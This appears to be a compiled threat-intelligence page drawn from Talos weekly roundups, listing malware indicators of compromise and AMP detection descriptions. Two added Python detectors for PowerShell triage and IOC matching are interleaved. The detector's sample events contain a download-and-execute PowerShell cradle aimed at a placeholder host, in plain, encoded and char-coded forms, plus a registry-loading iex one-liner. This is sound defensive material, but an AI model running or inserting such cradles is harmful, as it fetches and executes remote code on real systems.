42ee0201d3a74bf465daef9178042cc7fb28bab5b932e6d7a865cbc11fce6c94 472736830d9114c83bad680bc95c138d3951213d1429e314749b18083ac5cdf2 4d583b00c74ef261c7c20e53563b521ddda7b85bf5b1ac98463af0c6488a55d0 54b3c135aa1fe9b870209d36e286df1d7dc4e6182b664285f3564c573dbbdc89 `\n\n*See JSON for more IOCs\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAMP |  \nCloudlock | N/A \nCWS |  \nEmail Security |  \nNetwork Security |  \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella | N/A \nWSA |  \n \n#### Screenshots of Detection\n\n#### AMP\n\n[](<https://1.bp.blogspot.com/--j10gGhbFIw/XitQhRzhu3I/AAAAAAAADMA/mfL71YT3qRUdze9uqgfY3fDPm550V_MRQCLcBGAsYHQ/s1600/26f294e691ec271d761a167704d495ca8bdc4d66cb0cd332a0e49313164988b1_amp.png>)\n\n \n\n\n#### ThreatGrid\n\n[](<https://1.bp.blogspot.com/-i2qf-xTBN_I/XitQmZo7OUI/AAAAAAAADME/K8p_3SstFo8SODkhxhMLtTz-l9PZUA7ZACLcBGAsYHQ/s1600/3068250bcb0e8ffcee254c2da91e2696703bf36cfb195415aa3b0c454601dad1_tg.png>)\n\n \n\n\n \n\n\n* * *\n\n## Exploit Prevention\n\nCisco AMP for Endpoints protects users from a variety of malware functions with exploit prevention. Exploit prevention helps users defend endpoints from memory attacks commonly used by obfuscated malware and exploits. These exploits use certain features to bypass typical anti-virus software, but were blocked by AMP thanks to its advanced scanning capabilities, even protecting against zero-day vulnerabilities. \nCVE-2019-0708 detected \\- (8483) \n--- \nAn attempt to exploit CVE-2019-0708 has been detected. The vulnerability, dubbed BlueKeep, is a heap memory corruption which can be triggered by sending a specially crafted Remote Desktop Protocol (RDP) request. Since this vulnerability can be triggered without authentication and allows remote code execution, it can be used by worms to spread automatically without human interaction. 
**Atom Bombing code injection technique detected (795)**

A process created a suspicious Atom, which is indicative of a known process injection technique called Atom Bombing. Atoms are Windows identifiers that associate a string with a 16-bit integer. These Atoms are accessible across processes when placed in the global Atom table. Malware exploits this by placing shellcode as a global Atom, then retrieving it inside a target process through an Asynchronous Procedure Call (APC). The target process runs the queued APC function, which loads and runs the shellcode. The malware family Dridex is known to use Atom Bombing, but other threats may leverage it as well.

**Excessively long PowerShell command detected (576)**

A PowerShell command with a very long command line argument, which may indicate an obfuscated script, has been detected. PowerShell is an extensible Windows scripting language present by default on all supported versions of Windows. Malware authors use PowerShell in an attempt to evade security software or other monitoring that is not tuned to detect PowerShell-based threats.

**Process hollowing detected (288)**

Process hollowing is a technique used by some programs to avoid static analysis. In typical usage, a loader starts a legitimate process in a suspended state, unmaps (hollows out) that process's original image, writes its own unpacked, previously obfuscated or encrypted payload into the freed address space, repoints the entry point at the payload, and then resumes the process. The payload therefore runs under the name and image path of the legitimate process.

**Kovter injection detected (264)**

A process was injected into, most likely by an existing Kovter infection. Kovter is a click-fraud Trojan that can also act as an information stealer. Kovter is also fileless malware, meaning the malicious DLL is stored inside the Windows registry and injected directly into memory using PowerShell. It can detect and report the usage of monitoring software such as Wireshark and sandboxes to its C2. It spreads through malicious advertising and spam campaigns.

**Gamarue malware detected (193)**

Gamarue is a family of malware that can download files and steal information from an infected system. Worm variants of the Gamarue family may spread by infecting USB drives or portable hard disks that have been plugged into a compromised system.

**Installcore adware detected (90)**

InstallCore is an installer which bundles legitimate applications with offers for additional third-party applications that may be unwanted. The unwanted applications are often adware that display advertising in the form of pop-ups or by injecting into browsers and adding or altering advertisements on web pages. Adware is known to sometimes download and install malware.

**Dealply adware detected (61)**

DealPly is adware which claims to improve your online shopping experience. It is often bundled into other legitimate installers and is difficult to uninstall. It creates pop-up advertisements and injects advertisements on web pages. Adware has also been known to download and install malware.

**Reverse TCP payload detected (13)**

An exploit payload intended to connect back to an attacker-controlled host over TCP has been detected.

**WinExec payload detected (13)**

An exploit payload intended to execute a command on the compromised host through the WinExec API has been detected.
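The "excessively long PowerShell command" and Kovter items above describe what the product flags but not how to reproduce that triage from your own telemetry. The following is an added example (not Talos code): it scores process-creation events on command-line length, decodes `-EncodedCommand` payloads, and counts obfuscation and loader markers, including the Kovter-style pattern of a PowerShell one-liner that reads a registry-resident payload and runs it with `Invoke-Expression`. The length threshold, the marker list, the `example.invalid` URL and the sample events are all assumptions constructed for the example; the registry key in the last sample is taken from the Kovter table further down this page.

```python
"""Triage PowerShell command lines from process-creation telemetry.

Added example for this page (not Talos code). Event fields mimic a Sysmon
Event ID 1 export; the threshold and marker list are assumptions to tune.
"""
import base64
import re

# Assumed threshold; tune to the environment's normal PowerShell usage.
LENGTH_THRESHOLD = 600

_POWERSHELL_IMAGE = re.compile(r"(?:^|\\)(?:powershell|pwsh)(?:\.exe)?$", re.I)
_ENCODED_ARG = re.compile(r"-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})", re.I)

# Markers that, in combination, suggest an obfuscated or in-memory loader.
OBFUSCATION_MARKERS = (
    (re.compile(r"\[char\]", re.I), "char-code string construction"),
    (re.compile(r"-join\b", re.I), "string join"),
    (re.compile(r"`"), "backtick escaping"),
    (re.compile(r"\b(?:iex|invoke-expression)\b", re.I), "Invoke-Expression"),
    (re.compile(r"get-itemproperty|\.getvalue\(", re.I), "registry value read"),
    (re.compile(r"-w(?:indowstyle)?\s+hidden|-nop\b|-noni\b", re.I), "hidden/non-interactive switches"),
    (re.compile(r"downloadstring|downloadfile|invoke-webrequest|\biwr\b", re.I), "network download"),
)

# Constructed sample events (not from the roundup). Event 1338 carries a
# base64(UTF-16LE) download cradle; event 1339 mimics the Kovter pattern of
# reading a payload stored under a registry key named in the Kovter table.
_CRADLE = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a')"
_ENCODED = base64.b64encode(_CRADLE.encode("utf-16-le")).decode("ascii")
_CHARCODED = "+".join("[char]%d" % ord(c) for c in _CRADLE)

SAMPLE_EVENTS = [
    {"pid": 1201, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell.exe -NoProfile -File C:\scripts\backup.ps1"},
    {"pid": 1337, "image": r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -w hidden -nop -c $a=" + _CHARCODED + ";iex $a"},
    {"pid": 1338, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -NoP -NonI -W Hidden -Enc " + _ENCODED},
    {"pid": 1339, "image": r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell.exe -nop -w hidden -c iex([Text.Encoding]::ASCII.GetString("
                r"(Get-ItemProperty 'HKCU:\Software\FC6A75BE78').'0521341d'))"},
    {"pid": 1400, "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": "cmd.exe /c " + "x" * 2000},  # long, but not PowerShell: ignored
]


def decode_encoded_command(cmdline):
    """Return the UTF-16LE script behind -EncodedCommand, or None."""
    m = _ENCODED_ARG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyze_powershell(event):
    """Return a finding dict for a suspicious PowerShell launch, else None."""
    if not _POWERSHELL_IMAGE.search(event["image"]):
        return None
    cmd = event["cmdline"]
    decoded = decode_encoded_command(cmd)
    # Markers are checked over the visible command line plus the decoded
    # script, so an encoded cradle is scored on what it actually does.
    text = cmd if decoded is None else cmd + " " + decoded
    markers = ["encoded command"] if decoded is not None else []
    markers += [label for pat, label in OBFUSCATION_MARKERS if pat.search(text)]
    reasons = []
    if len(cmd) > LENGTH_THRESHOLD:
        reasons.append("command line length %d exceeds %d" % (len(cmd), LENGTH_THRESHOLD))
    if len(markers) >= 2:  # a single switch such as -NoProfile is normal admin usage
        reasons.append("obfuscation/loader markers: " + ", ".join(markers))
    if not reasons:
        return None
    return {"pid": event["pid"], "reasons": reasons, "decoded": decoded}


def analyze_events(events):
    """Run analyze_powershell over a batch and keep only the findings."""
    return [f for f in (analyze_powershell(e) for e in events) if f is not None]


if __name__ == "__main__":
    for finding in analyze_events(SAMPLE_EVENTS):
        print(finding["pid"], "; ".join(finding["reasons"]))
```

On the constructed events the benign `-NoProfile -File` launch and the long `cmd.exe` line produce nothing, while the char-coded script trips both the length and the marker rule, the `-Enc` launcher is scored on its decoded cradle, and the registry-reading one-liner is caught by markers alone even though it is short. Requiring two markers is the deliberate trade-off: it keeps `-NoProfile` or a lone `Invoke-WebRequest` out of the alert queue.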
The exploit-prevention list above comes from the Talos blog post "Threat Roundup for January 17 to January 24" (published 2020-01-24; CVE list: CVE-2019-0708, CVSS 10.0, AV:N/AC:L/Au:N/C:C/I:C/A:C; <http://feedproxy.google.com/~r/feedburner/Talos/~3/1IoxheLePug/threat-roundup-0117-0124.html>).

* * *

## Threat Roundup for Sept. 20 to Sept. 27

Talos blog post, retrieved 2019-09-27.

Today, Talos is publishing a glimpse into the most prevalent threats we've observed between Sept. 20 and Sept. 27. As with previous roundups, this post isn't meant to be an in-depth analysis. Instead, this post will summarize the threats we've observed by highlighting key behavioral characteristics, indicators of compromise, and discussing how our customers are automatically protected from these threats.

As a reminder, the information provided for the following threats in this post is non-exhaustive and current as of the date of publication. Additionally, please keep in mind that IOC searching is only one part of threat hunting. Spotting a single IOC does not necessarily indicate maliciousness. Detection and coverage for the following threats is subject to updates, pending additional threat or vulnerability analysis. For the most current information, please refer to your Firepower Management Center, Snort.org, or ClamAV.net.

For each threat described below, this blog post only lists 25 of the associated file hashes and up to 25 IOCs for each category. An accompanying JSON file can be found [here](<https://alln-extcloud-storage.cisco.com/ciscoblogs/5d8e0349422a9.txt>) that includes the complete list of file hashes, as well as all other IOCs from this post.
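The IOC tables that follow are defanged (`74[.]208[.]236[.]145`, `otc-manila[.]com`), some IP rows carry a `/31` or `/27` suffix rather than a single address, and every header repeats that a hit "does not indicate maliciousness". The following is an added example (not Talos tooling) of the loader a hunter would write for that format: it refangs the rows, keeps the suffixed entries as CIDR networks, matches them against DNS and proxy log lines, and tags hits on shared mail and cloud infrastructure so they are not escalated on their own. The table excerpt reuses values from the Emotet table below; the log lines, the `SHARED_SUFFIXES` list and the two hit classes are assumptions constructed for the example.

```python
"""Load defanged IOCs in the roundup's table layout and match them against logs.

Added example for this page (not Talos tooling). The shared-suffix list,
the log lines and the hit classes are assumptions; the indicator values are
copied from the Emotet table on this page.
"""
import ipaddress
import re

# Constructed excerpt in the roundup's own table layout.
IOC_TABLE = """\
IP Addresses contacted by malware. Does not indicate maliciousness | Occurrences
---|---
`74[.]208[.]236[.]145` | 31
`86[.]109[.]99[.]70/31` | 8
Domain Names contacted by malware. Does not indicate maliciousness | Occurrences
---|---
`otc-manila[.]com` | 31
`smtp[.]outlook[.]com` | 5
"""

# Assumed list of shared infrastructure that clean hosts also talk to; hits on
# these are kept but tagged so they are not escalated on their own.
SHARED_SUFFIXES = ("outlook.com", "1und1.de", "secureserver.net", "google.com")

# Constructed DNS and proxy log lines (private client addresses).
SAMPLE_LOGS = [
    "2019-09-25T10:01:02Z dns client=10.0.0.12 query=otc-manila.com type=A",
    "2019-09-25T10:01:03Z proxy client=10.0.0.12 dst=74.208.236.145:8080 method=POST",
    "2019-09-25T10:05:00Z proxy client=10.0.0.40 dst=86.109.99.71:443 method=CONNECT",
    "2019-09-25T10:06:00Z dns client=10.0.0.41 query=smtp.outlook.com type=A",
    "2019-09-25T10:07:00Z dns client=10.0.0.42 query=example.com type=A",
]

_ROW = re.compile(r"`([^`]+)`\s*\|\s*(\d+)")
_IPV4 = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")
_HOST = re.compile(r"\b(?:[a-z0-9-]+\.)+[a-z]{2,}\b", re.I)


def refang(value):
    """Turn the table's defanged "[.]" back into a real dot."""
    return value.replace("[.]", ".")


def load_iocs(table_text):
    """Parse backticked rows into (network, count) and (domain, count) lists.

    A bare address becomes a /32; a row with a /NN suffix stays a network,
    so the /31 pairs in the tables match both of their addresses.
    """
    networks, domains = [], []
    for raw, count in _ROW.findall(table_text):
        value = refang(raw.strip())
        try:
            networks.append((ipaddress.ip_network(value, strict=False), int(count)))
        except ValueError:
            domains.append((value.lower(), int(count)))
    return networks, domains


def classify(domain):
    """Tag domains under assumed shared-service suffixes as needing context."""
    for suffix in SHARED_SUFFIXES:
        if domain == suffix or domain.endswith("." + suffix):
            return "shared-infrastructure"
    return "indicator-hit"


def match_logs(networks, domains, lines):
    """Return one hit per (line, indicator), carrying the table's occurrence count."""
    hits = []
    for n, line in enumerate(lines):
        for text in _IPV4.findall(line):
            try:
                ip = ipaddress.ip_address(text)
            except ValueError:
                continue
            hits += [{"line": n, "indicator": str(net), "occurrences": c, "class": "indicator-hit"}
                     for net, c in networks if ip in net]
        for host in _HOST.findall(line):
            host = host.lower()
            hits += [{"line": n, "indicator": dom, "occurrences": c, "class": classify(dom)}
                     for dom, c in domains if host == dom or host.endswith("." + dom)]
    return hits


def run():
    """Match the constructed logs against the constructed table excerpt."""
    networks, domains = load_iocs(IOC_TABLE)
    return match_logs(networks, domains, SAMPLE_LOGS)


if __name__ == "__main__":
    for hit in run():
        print(hit)
```

The shared-infrastructure tag is the point the tables' headers are making: the Tofsee list further down is mostly DNSBL lookups, WHOIS servers and Outlook MX hosts, and the Shade list includes `login[.]microsoftonline[.]com`, none of which should page anyone on a single hit. The occurrence count is carried through so the hunter can weight a hit on `otc-manila[.]com` (31 of 31 samples) above one seen in a handful of detonations.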
As always, please remember that all IOCs contained in this document are indicators, and one single IOC does not indicate maliciousness.

The most prevalent threats highlighted in this roundup are:

Threat Name | Type | Description
---|---|---
Doc.Downloader.Emotet-7181535-0 | Downloader | Emotet is a banking trojan that has remained relevant due to its continual evolution to better avoid detection. It is commonly spread via malicious emails. It recently resurfaced after going quiet over the summer of 2019.
Win.Ransomware.Shade-7178907-1 | Ransomware | Shade, also known as Troldesh, is a ransomware family typically spread via malicious email attachments.
Win.Dropper.Cerber-7174760-0 | Dropper | Cerber is ransomware that encrypts documents, photos, databases and other important files. Historically, this malware would replace files with encrypted versions and add the file extension ".cerber," although in more recent campaigns, this is no longer the case.
Win.Dropper.Kovter-7173679-0 | Dropper | Kovter is known for its fileless persistence mechanism. This family of malware creates several malicious registry entries which store its malicious code. Kovter is capable of reinfecting a system even if the file system has been cleaned of the infection. Kovter has been used in the past to spread ransomware and click-fraud malware.
Win.Malware.Zusy-7173469-1 | Malware | Zusy, also known as TinyBanker or Tinba, is a trojan that uses man-in-the-middle attacks to steal banking information. When executed, it injects itself into legitimate Windows processes such as "explorer.exe" and "winver.exe." When the user accesses a banking website, it displays a form to trick the user into submitting personal information.
Win.Packed.Tofsee-7171939-0 | Packed | Tofsee is multi-purpose malware that features a number of modules used to carry out various activities such as sending spam messages, conducting click fraud, mining cryptocurrency, and more. Infected systems become part of the Tofsee spam botnet and are used to send large volumes of spam messages in an effort to infect additional systems and increase the overall size of the botnet under the operator’s control.

* * *

## Threat Breakdown

### Doc.Downloader.Emotet-7181535-0

#### Indicators of Compromise

Registry Keys | Occurrences
---|---
`<HKCR>\INTERFACE\{8BD21D12-EC42-11CE-9E0D-00AA006002F3}` | 31
`<HKCR>\WOW6432NODE\INTERFACE\{8BD21D22-EC42-11CE-9E0D-00AA006002F3}` | 31
`<HKCR>\INTERFACE\{8BD21D22-EC42-11CE-9E0D-00AA006002F3}` | 31
`<HKCR>\WOW6432NODE\INTERFACE\{8BD21D32-EC42-11CE-9E0D-00AA006002F3}` | 31
`<HKCR>\INTERFACE\{8BD21D32-EC42-11CE-9E0D-00AA006002F3}` | 31
`<HKCR>\WOW6432NODE\INTERFACE\{8BD21D42-EC42-11CE-9E0D-00AA006002F3}` | 31
`<HKCR>\INTERFACE\{8BD21D42-EC42-11CE-9E0D-00AA006002F3}` | 31
`<HKCR>\WOW6432NODE\INTERFACE\{8BD21D52-EC42-11CE-9E0D-00AA006002F3}` | 31
`<HKCR>\INTERFACE\{8BD21D52-EC42-11CE-9E0D-00AA006002F3}` | 31
`<HKCR>\WOW6432NODE\INTERFACE\{8BD21D62-EC42-11CE-9E0D-00AA006002F3}` | 31
`<HKCR>\INTERFACE\{8BD21D62-EC42-11CE-9E0D-00AA006002F3}` | 31
`<HKCR>\WOW6432NODE\INTERFACE\{7B020EC2-AF6C-11CE-9F46-00AA00574A4F}` | 31
`<HKCR>\INTERFACE\{7B020EC2-AF6C-11CE-9F46-00AA00574A4F}` | 31
`<HKCR>\WOW6432NODE\INTERFACE\{7B020EC7-AF6C-11CE-9F46-00AA00574A4F}` | 31
`<HKCR>\INTERFACE\{7B020EC7-AF6C-11CE-9F46-00AA00574A4F}` | 31
`<HKCR>\WOW6432NODE\INTERFACE\{4C5992A5-6926-101B-9992-00000B65C6F9}` | 31
`<HKCR>\INTERFACE\{4C5992A5-6926-101B-9992-00000B65C6F9}` | 31
`<HKCR>\WOW6432NODE\INTERFACE\{796ED650-5FE9-11CF-8D68-00AA00BDCE1D}` | 31
`<HKCR>\INTERFACE\{796ED650-5FE9-11CF-8D68-00AA00BDCE1D}` | 31
`<HKCR>\WOW6432NODE\INTERFACE\{47FF8FE0-6198-11CF-8CE8-00AA006CB389}` | 31
`<HKCR>\INTERFACE\{47FF8FE0-6198-11CF-8CE8-00AA006CB389}` | 31
`<HKCR>\WOW6432NODE\INTERFACE\{47FF8FE2-6198-11CF-8CE8-00AA006CB389}` | 31
`<HKCR>\INTERFACE\{47FF8FE2-6198-11CF-8CE8-00AA006CB389}` | 31
`<HKCR>\WOW6432NODE\INTERFACE\{47FF8FE3-6198-11CF-8CE8-00AA006CB389}` | 31
`<HKCR>\INTERFACE\{47FF8FE3-6198-11CF-8CE8-00AA006CB389}` | 31

Mutexes | Occurrences
---|---
`Global\I98B68E3C` | 31
`Global\M98B68E3C` | 31
`5CAC3FAB-87F0-4750-984D-D50144543427-VER15` | 2
`Local\{F99C425F-9135-43ed-BD7D-396DE488DC53}` | 2

IP Addresses contacted by malware. Does not indicate maliciousness | Occurrences
---|---
`74[.]208[.]236[.]145` | 31
`190[.]158[.]19[.]141` | 27
`139[.]5[.]237[.]27` | 27
`5[.]45[.]108[.]146` | 8
`86[.]109[.]99[.]70/31` | 8
`17[.]36[.]205[.]74` | 7
`173[.]194[.]68[.]108/31` | 7
`195[.]114[.]1[.]181` | 7
`82[.]223[.]190[.]138/31` | 7
`181[.]123[.]0[.]125` | 7
`80[.]94[.]2[.]233` | 7
`217[.]116[.]0[.]237` | 6
`62[.]149[.]157[.]55` | 6
`195[.]20[.]225[.]171` | 6
`173[.]194[.]175[.]108/31` | 5
`201[.]214[.]74[.]71` | 5
`212[.]227[.]15[.]158` | 4
`182[.]50[.]144[.]84` | 4
`193[.]70[.]18[.]144` | 4
`193[.]17[.]41[.]99` | 4
`212[.]227[.]15[.]142` | 4
`162[.]210[.]102[.]199` | 4
`212[.]227[.]15[.]135` | 4
`217[.]116[.]0[.]228` | 4
`62[.]149[.]128[.]42` | 4

*See JSON for more IOCs

Domain Names contacted by malware. Does not indicate maliciousness | Occurrences
---|---
`otc-manila[.]com` | 31
`smtp[.]mail[.]me[.]com` | 7
`smtp[.]movistar[.]es` | 7
`mail[.]tradeus[.]eu` | 7
`mail[.]serviciodecorreo[.]es` | 6
`smtp[.]1and1[.]es` | 6
`imap[.]1und1[.]de` | 6
`smtp[.]serviciodecorreo[.]es` | 6
`mail[.]aruba[.]it` | 6
`mail[.]ionos[.]es` | 6
`mail[.]gwiazdeczka[.]pl` | 6
`smtp[.]outlook[.]com` | 5
`pop-mail[.]outlook[.]com` | 5
`smtpout[.]secureserver[.]net` | 5
`smtp[.]1und1[.]de` | 5
`imap[.]serviciodecorreo[.]es` | 5
`mail[.]zenithexperience[.]es` | 5
`mail[.]comcast[.]net` | 4
`mail[.]1und1[.]de` | 4
`pop[.]asia[.]secureserver[.]net` | 4
`smtp[.]orange[.]fr` | 4
`ssl0[.]ovh[.]net` | 4
`poczta[.]o2[.]pl` | 4
`smtp[.]aruba[.]it` | 4
`mbox[.]freehostia[.]com` | 4

*See JSON for more IOCs

Files and or directories created | Occurrences
---|---
`%HOMEPATH%\657.exe` | 31
`\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{8BD21D10-EC42-11CE-9E0D-00AA006002F3}` | 1
`%SystemRoot%\SysWOW64\gcycF3Sb1.exe` | 1
`%SystemRoot%\SysWOW64\qoOwTVXh.exe` | 1
`%SystemRoot%\SysWOW64\gMVKv3.exe` | 1
`%TEMP%\CVRF2C.tmp` | 1
`%TEMP%\CVRB39.tmp` | 1
`%TEMP%\CVRDF3.tmp` | 1

#### File Hashes

```
075a45f9c68a9f5af201e7863394c91cf5a1f939d2a6b21fbd9c749c0a10696f
291a9820bceb930a4106c341c6bb37f2242b5ca0c653923db92dcac50d9c953f
2926d350ee2037949c36a19aca959b8404626f09d32bf930cf9b218424f7cf27
2991af9ecbba0ae304f43ab19ba172ef2ff18345b5fd8f7abc4bc4e2b0a775b3
2a078275cdeb69e448bd7cea359ce34c05ab028713357df0b70448dcdb9f8f0c
3e390763b85cd1322e1fe528ab15923df480ce1f2dabff373bfc67ed8d0d5aa7
5855ccd73204841b2e32d2cd93598ef8b5e0698abc5a8cea26b7e14b279a7448
5a8c51d22698e05215e2f3fdc50a14342fb3108acf6bde761c87d9ae2106d5d1
5c221d09b195901d9435a897f131cb06b9c88bc24d34f7effe2168a66bf935cc
6a8beeef74251f9d91d1965649cabfd7f9840e4ba63259c91c8ecd9020cdda45
6bf59378b0897e410d4d9faa0a23d22e6e96ebedbe3d543338d1f9f3d9c3f21a
742719dfdde109a1cff437941a1f14d8eb3a844a22da6c010d09b835366bb2dd
777d585b5e7e30bce1d8e8e343a007e9d0b6e4f45afa9f415b3fb8b3296a50f0
77d0c4316554e2f7c78b7554f0d067c210c242cb0150a8a1aa3ab4b0d6ccc9df
7a375d0966ac0053e566827ddd3a6c9d2f8251f2a754f0502a61a89f98a94ea9
83f74cedc1e06f0b2377df8d41e67ed0273948888705fbe391e1d82849c54330
8ce63dc6baa9a80c3913d462bdb19fc1bc1ba635bde1d5a6c26fc5f7cf325ea4
a44828c3d4266e7b6518fb6be06907d6d9de2c48546d7ea2c73c2fed3f3fa75c
a88780c026c4094e0580a2ab21118b96dab08e00d1935bd6fae2946fd81bdb03
b1d366a828f6eb91a08dd023aa98f2b8b9737497eff937e2d169e5a6b6377d25
b637cedefc7244a8a84bede6eb7733803744f4ac140ed368da9a64c06e98dc28
ba3f8c880453fc3cd667709325895c93cfe6a1e371456c58336e6bb7455668dc
c19c5960f37853a5f2db86cc749593dd98b124ddd21d39b8ca53c921389a0bd6
c4c30e304d232b9b5cf276d9534675dff3a541ee41b271fed54a37b3f1fd9aef
cbb3ac37b40296794f6f30dd6efc2a9cb3cc35f2438b8ba89f14b58971e14d26
```

*See JSON for more IOCs

#### Coverage

Product | Protection (icons not reproduced)
---|---
AMP | 
Cloudlock | N/A
CWS | 
Email Security | 
Network Security | 
Stealthwatch | N/A
Stealthwatch Cloud | N/A
Threat Grid | 
Umbrella | 
WSA | 

#### Screenshots of Detection

AMP, ThreatGrid, Umbrella and Malware detection screenshots (images not reproduced).

* * *

### Win.Ransomware.Shade-7178907-1

#### Indicators of Compromise

Registry Keys | Occurrences
---|---
`<HKLM>\SOFTWARE\WOW6432NODE\SYSTEM32\CONFIGURATION` Value Name: `xi` | 155
`<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN` Value Name: `Client Server Runtime Subsystem` | 155
`<HKLM>\SOFTWARE\WOW6432NODE\SYSTEM32\CONFIGURATION` Value Name: `xVersion` | 155
`<HKLM>\SOFTWARE\WOW6432NODE\SYSTEM32` | 154
`<HKLM>\SOFTWARE\WOW6432NODE\SYSTEM32\CONFIGURATION` | 154
`<HKLM>\SOFTWARE\WOW6432NODE\SYSTEM32\CONFIGURATION` Value Name: `xmode` | 76
`<HKLM>\SOFTWARE\WOW6432NODE\SYSTEM32\CONFIGURATION` Value Name: `xpk` | 76
`<HKLM>\SOFTWARE\WOW6432NODE\SYSTEM32\CONFIGURATION` Value Name: `xstate` | 76
`<HKLM>\SOFTWARE\WOW6432NODE\SYSTEM32\CONFIGURATION` Value Name: `shst` | 75
`<HKLM>\SOFTWARE\WOW6432NODE\SYSTEM32\CONFIGURATION` Value Name: `sh1` | 75
`<HKLM>\SOFTWARE\WOW6432NODE\SYSTEM32\CONFIGURATION` Value Name: `shsnt` | 73
`<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER` Value Name: `CleanShutdown` | 36
`<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\APPLETS\SYSTRAY` Value Name: `Services` | 26
`<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\TELEPHONY` Value Name: `DomainName` | 13
`<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\TELEPHONY` Value Name: `TAPISRVSCPGUID` | 13
`<HKLM>\SOFTWARE\WOW6432NODE\SYSTEM32\CONFIGURATION` Value Name: `xmail` | 9

Mutexes | Occurrences
---|---
`GeneratingSchemaGlobalMapping` | 64
`cversions.2.m` | 35
`Global\47348ae1-defe-11e9-a007-00501e3ae7b5` | 1
`Global\f1f16ad1-df02-11e9-a007-00501e3ae7b5` | 1

IP Addresses contacted by malware. Does not indicate maliciousness | Occurrences
---|---
`66[.]171[.]248[.]178` | 75
`128[.]31[.]0[.]39` | 57
`208[.]83[.]223[.]34` | 56
`194[.]109[.]206[.]212` | 53
`154[.]35[.]32[.]5` | 52
`76[.]73[.]17[.]194` | 51
`171[.]25[.]193[.]9` | 50
`193[.]23[.]244[.]244` | 46
`86[.]59[.]21[.]38` | 46
`131[.]188[.]40[.]188/31` | 46
`132[.]148[.]98[.]116` | 19
`79[.]98[.]28[.]28` | 13
`198[.]187[.]29[.]35` | 11
`173[.]236[.]177[.]100` | 8
`162[.]216[.]45[.]5` | 6
`46[.]105[.]57[.]169` | 5
`198[.]54[.]120[.]231` | 5
`94[.]23[.]64[.]3` | 5
`13[.]107[.]21[.]200` | 4
`204[.]79[.]197[.]200` | 4
`5[.]9[.]158[.]75` | 4
`23[.]6[.]22[.]189` | 4
`145[.]239[.]6[.]188/31` | 4
`47[.]101[.]49[.]13` | 4
`66[.]33[.]211[.]13` | 4

*See JSON for more IOCs

Domain Names contacted by malware. Does not indicate maliciousness | Occurrences
---|---
`ipv4bot[.]whatismyipaddress[.]com` | 75
`api[.]w[.]org` | 12
`gmpg[.]org` | 7
`www[.]breilginestet[.]fr` | 5
`getjobportal[.]com` | 5
`saschoolsphotography[.]co[.]za` | 5
`www[.]loudgraphicsonline[.]com` | 5
`login[.]microsoftonline[.]com` | 4
`filesextension[.]com` | 4
`www[.]solvusoft[.]com` | 4
`shell[.]windows[.]com` | 4
`fileinfo[.]com` | 4
`openfile[.]club` | 4
`file[.]org` | 4
`www[.]techwalla[.]com` | 4
`opentmpfile[.]com` | 4
`freeformmanagementco[.]com` | 4
`manosapnas[.]lt` | 4
`www[.]wuyufeng[.]cn` | 4
`jdcontractingomaha[.]com` | 4
`www[.]lalogarcia[.]es` | 4
`www[.]mobiadnews[.]com` | 4
`paulbacinodentistry[.]com` | 4
`levente[.]biz[.]pk` | 4
`www[.]anniechase[.]com` | 4

*See JSON for more IOCs

Files and or directories created | Occurrences
---|---
`%ProgramData%\Windows\csrss.exe` | 155
`%ProgramData%\Windows` | 154
`%TEMP%\6893A5D897` | 154
`\README1.txt` | 76
`\README10.txt` | 76
`\README2.txt` | 76
`\README3.txt` | 76
`\README4.txt` | 76
`\README5.txt` | 76
`\README6.txt` | 76
`\README7.txt` | 76
`\README8.txt` | 76
`\README9.txt` | 76
`%APPDATA%\Mozilla\Firefox\profiles.ini` | 71

#### File Hashes

```
01a47aefed5ad89958df66ceaaece3eb1028f5eb339b5fc405c365bf016652ae
0450d2d5b575c24bf8fc23859a53432ba1ea2bcb44bf9e143e1740c2643074f1
04d08fed39c68ff27751497d6cb543d8a7d082cd2efdda0515853a9fa0f8d70c
053eb4558f17ff9d2e8af9fc171f279b1a43be35a309ca1298f581eb332a8790
07e7472cce0ba35d0f9548372f2b93d56e5fe7597a8de0de337c3a2d96f2c69c
093b4505194249591522a9bed6abfc24d9911d4a64c89a51a46ac75d41a0f3a4
0bdf07fea4e8ae1e9d2e0bb4404770dd32eca713a3d6e1aeac9e61fe99925e46
0cf81c6a0a6181bbce5722c133852889b4dc09752453df36298179ef4d944deb
0ff03d25c9b864f54528b717a00fe970de388859ee81927a396621cf8dbf863b
1130c8c8e7efb0f284f7d6b8b1089668209ff18dba350d3e92fd79ad926043e7
1182d3ff1023ae91fb020eae5e94d8cbba61830118e0056fa3258a4e12759582
12df326da78cbb6da153914c68589ead268cace00a86085ea499c6f7f1562586
146c7a3b418c9b3525b2f5e87be07d252c25be2443600d3f72cddb45b8d3090c
149fa66f4458bb3300e1ff199d2f7f49922dce62980355b011625ed420215687
154c8df75639241776394de1d5c049f7851f0aef4471d4bf52d570707d0f768e
15e2104c27574da42e078a601acf2eb4c0bf70dabfaa9613b490fcb9b44a244f
17c184a6bb5976dcdc89a192409c80e9b4034334baf31017cff23fb2236316ca
180018cdf5693f805c584fa96443960fa18d94f98e17c8d9ebee15e33439a717
19eebbaaebcc15648f5a7c54b4090587cb63ff5ca61a18ea5261a9d5c4e20913
1ab04b2a9761d339b42f963aa0329e53e388b3c685ebb388cb7165cbd0eb7ee4
